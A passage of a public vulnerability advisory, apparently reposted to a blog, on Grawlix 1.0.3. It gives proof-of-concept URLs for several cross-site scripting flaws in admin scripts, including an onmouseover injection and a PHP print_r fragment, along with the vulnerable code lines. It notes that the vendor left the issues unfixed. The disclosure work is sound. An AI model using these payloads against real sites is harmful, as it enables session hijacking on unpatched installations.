$_GET|';print_r($_GET);echo '|'; XSS 3 The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=">Code: _admin/site.nav-edit.ajax.php $edit_id = $_GET['edit_id']; [...] $modal->value($edit_id); _admin/lib/GrlxForm.php $this->value ? $value = ' value="'.$this->value.'"' : null; XSS 4 When viewing the book overview, the start_sort_order parameter is vulnerable to XSS. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=" onmouseover="alert(1) Code: _admin/book.view.php $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order"); XSS 5 (limited) In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers. Proof of Concept: http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=" style="STYLE http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id=" style="STYLE 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: http://ift.tt/1NCqGiG
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment